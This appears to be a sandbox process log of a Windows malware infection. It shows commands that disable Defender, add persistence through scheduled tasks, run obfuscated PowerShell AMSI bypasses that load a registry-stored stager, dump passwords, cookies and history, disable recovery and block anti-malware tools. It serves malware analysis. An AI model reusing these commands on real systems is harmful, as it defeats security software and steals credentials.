C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath 'C:\' -Force
C:\Users\$77Redownloader.exe
"C:\Users\$77Redownloader.exe" -o"C:\Users\Admin\AppData\Local\Microsoft\Windows" -y
C:\Windows\system32\reg.exe
Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatIdDefaultAction" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147772079" /t REG_SZ /d "6" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147735505" /t REG_SZ /d "6" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147745502" /t REG_SZ /d "6" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t "REG_DWORD" /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "5" /t "REG_SZ" /d "6" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "1" /t "REG_SZ" /d "6" /f
C:\Windows\system32\timeout.exe
timeout 10
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe"
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /RU Admin /create /tn "$77Stellacy.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /sc minute /mo 1 /RL HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /RU Admin /create /tn "$77SX.job" /tr "'C:\Windows\System32\Wscript.exe'C:\Users\Admin\AppData\Local\Microsoft\Windows\$77vbs.vbs" /sc minute /mo 40 /RL HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks /RU Admin /create /tn "$77STLR.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe" /sc onstart /RL HIGHEST /f
C:\Windows\system32\timeout.exe
timeout 10
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "$77Quasar.job" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /rl HIGHEST /f
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 3d7545f5200a47d233b3f2f8f659efad WVQAETX4RU+OCJDHATFoIA.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4cciCKuj10fS4tEFtsNPmrL/0jPo2AcIdfc9jK0U15Lp5iXQGku3ZLiCUn4WwDSh+A0ftN5CXUAmVy5X4PPHFWMzuIK7S46Iv9KhQeGUN+idJw7zi086Au7DP0yct2lQY=
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe"
C:\Windows\system32\timeout.exe
timeout 20
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:WanTajdusvCi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YbAhvEdfwiywiX,[Parameter(Position=1)][Type]$XAGLRCYBxk)$aUEeznrsWJp=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$aUEeznrsWJp.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$YbAhvEdfwiywiX).SetImplementationFlags('Runtime,Managed');$aUEeznrsWJp.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$XAGLRCYBxk,$YbAhvEdfwiywiX).SetImplementationFlags('Runtime,Managed');Write-Output $aUEeznrsWJp.CreateType();}$vfvBfeSrphbGm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$rhAIJHZXwnCuUb=$vfvBfeSrphbGm.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tOkucufcqJuEeHBOXif=WanTajdusvCi @([String])([IntPtr]);$sBxwAOIYsTUghGSQmOhzBI=WanTajdusvCi 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rbFjmeZKjzf=$vfvBfeSrphbGm.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ZMaZtRoFFGmQJZ=$rhAIJHZXwnCuUb.Invoke($Null,@([Object]$rbFjmeZKjzf,[Object]('Load'+'LibraryA')));$NDNmMGzHCxnxcqqmU=$rhAIJHZXwnCuUb.Invoke($Null,@([Object]$rbFjmeZKjzf,[Object]('Vir'+'tual'+'Pro'+'tect')));$smSFNae=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZMaZtRoFFGmQJZ,$tOkucufcqJuEeHBOXif).Invoke('a'+'m'+'si.dll');$RJWkHcQIUZqPNUrix=$rhAIJHZXwnCuUb.Invoke($Null,@([Object]$smSFNae,[Object]('Ams'+'iSc'+'an'+'Buffer')));$WhhbfUqHtK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NDNmMGzHCxnxcqqmU,$sBxwAOIYsTUghGSQmOhzBI).Invoke($RJWkHcQIUZqPNUrix,[uint32]8,4,[ref]$WhhbfUqHtK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$RJWkHcQIUZqPNUrix,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NDNmMGzHCxnxcqqmU,$sBxwAOIYsTUghGSQmOhzBI).Invoke($RJWkHcQIUZqPNUrix,[uint32]8,0x20,[ref]$WhhbfUqHtK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:LPpCafCnPhGW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rbwbyRJwDfjMMc,[Parameter(Position=1)][Type]$BhvZKaLGRD)$mvwfdZfGBQc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$mvwfdZfGBQc.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$rbwbyRJwDfjMMc).SetImplementationFlags('Runtime,Managed');$mvwfdZfGBQc.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$BhvZKaLGRD,$rbwbyRJwDfjMMc).SetImplementationFlags('Runtime,Managed');Write-Output $mvwfdZfGBQc.CreateType();}$CxKhFyPBjiDDB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$CdjVPztmwZThlQ=$CxKhFyPBjiDDB.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PgQSsNxxivDMKKUvVcQ=LPpCafCnPhGW @([String])([IntPtr]);$VVrxkLvpZIlYISqOIcGKFw=LPpCafCnPhGW 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aEaENWQeyqy=$CxKhFyPBjiDDB.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ptJYyEEyVqFZiM=$CdjVPztmwZThlQ.Invoke($Null,@([Object]$aEaENWQeyqy,[Object]('Load'+'LibraryA')));$bHkrZewmoHwTPxthi=$CdjVPztmwZThlQ.Invoke($Null,@([Object]$aEaENWQeyqy,[Object]('Vir'+'tual'+'Pro'+'tect')));$GYnbwZW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptJYyEEyVqFZiM,$PgQSsNxxivDMKKUvVcQ).Invoke('a'+'m'+'si.dll');$cvXEVGvFkffjFmvEu=$CdjVPztmwZThlQ.Invoke($Null,@([Object]$GYnbwZW,[Object]('Ams'+'iSc'+'an'+'Buffer')));$BNQEsTfAgW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bHkrZewmoHwTPxthi,$VVrxkLvpZIlYISqOIcGKFw).Invoke($cvXEVGvFkffjFmvEu,[uint32]8,4,[ref]$BNQEsTfAgW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cvXEVGvFkffjFmvEu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bHkrZewmoHwTPxthi,$VVrxkLvpZIlYISqOIcGKFw).Invoke($cvXEVGvFkffjFmvEu,[uint32]8,0x20,[ref]$BNQEsTfAgW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{877d7f65-92aa-4771-b2cf-8fde54bedb2c}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e6194327-a952-4558-90c8-ce6936860160}
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
C:\Users\Admin\AppData\Local\Temp\hh.exe
C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\xwizard.exe
C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\system32\ReAgentc.exe
reagentc.exe /disable
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\reagentc.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\reagentc.exe" /grant *S-1-5-32-544:F /T /C /Q
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\reagent.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\reagent.dll" /grant *S-1-5-32-544:F /T /C /Q
C:\Windows\system32\taskkill.exe
taskkill /im "SecurityHealthSystray.exe" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MRT" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MRT.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "rkill.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "rkill32.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "rkill64.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "MBSetup.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "mbam.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "mbar.exe" /f
C:\Windows\system32\timeout.exe
timeout 2
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
Network
Files